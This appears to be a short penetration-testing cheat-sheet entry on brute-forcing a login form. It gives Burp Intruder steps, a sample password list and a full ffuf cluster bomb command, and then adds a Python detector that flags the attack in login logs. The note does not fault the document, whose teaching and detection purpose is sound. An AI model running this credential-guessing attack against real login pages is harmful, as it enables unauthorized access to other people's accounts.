Brute Force Login Page (Cluster Bomb With Burp Suite)

  • username file : /usr/share/seclists/Usernames/top-usernames-shortlist.txt
  • pass file : pass.txt
~ cat pass.txt

123456
password
password123
letmein

Capture the login request and send it to Burp Intruder. Select the Cluster bomb attack type, highlight the values to attack, then select the payloads and start the attack.

Brute Force Login Page (Cluster Bomb With ffuf)

Capture the login request, mark the attack points with the FUZZUSER and FUZZPASSWORD keywords, and save it as req.txt.

Then run the attack with ffuf (-fs hides responses of the listed sizes):

ffuf -request req.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSER -w pass.txt:FUZZPASSWORD -fs 3256,3356
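
Seen from the server side, a cluster bomb run shows up as one source failing logins for several usernames, with several passwords tried against each. The following is an added example, not part of the original write-up, of detection logic for that pattern; the log format, thresholds, IP addresses and usernames are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from itertools import product

# Assumed log format (constructed for this example):
#   "<ISO time> <src_ip> <username> <FAIL|OK>"
def parse(line):
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result

def detect_cluster_bomb(lines, window=timedelta(minutes=5), min_users=3, min_per_user=3):
    """Return source IPs that, inside one sliding window, failed logins for at
    least min_users distinct usernames with at least min_per_user failures each."""
    recent = defaultdict(deque)  # ip -> (time, user) failures still inside the window
    flagged = set()
    for ts, ip, user, result in sorted(map(parse, lines)):
        if result != "FAIL":
            continue
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        per_user = defaultdict(int)
        for _, u in q:
            per_user[u] += 1
        heavy = [u for u, n in per_user.items() if n >= min_per_user]
        if len(heavy) >= min_users:
            flagged.add(ip)
    return flagged

def sample_log():
    """Constructed sample: one source walking a 4x4 user/password grid, plus a
    legitimate user who mistypes a password twice and then logs in."""
    start = datetime(2024, 1, 1, 12, 0, 0)
    users = ["root", "admin", "test", "guest"]
    lines = []
    for i, (user, _pw) in enumerate(product(users, range(4))):
        lines.append(f"{(start + timedelta(seconds=i)).isoformat()} 203.0.113.7 {user} FAIL")
    for i, res in enumerate(["FAIL", "FAIL", "OK"]):
        lines.append(f"{(start + timedelta(seconds=30 * i)).isoformat()} 198.51.100.20 alice {res}")
    return lines

if __name__ == "__main__":
    print(detect_cluster_bomb(sample_log()))
```

Requiring several failures per username across several usernames separates the username-by-password grid from a single user mistyping a password.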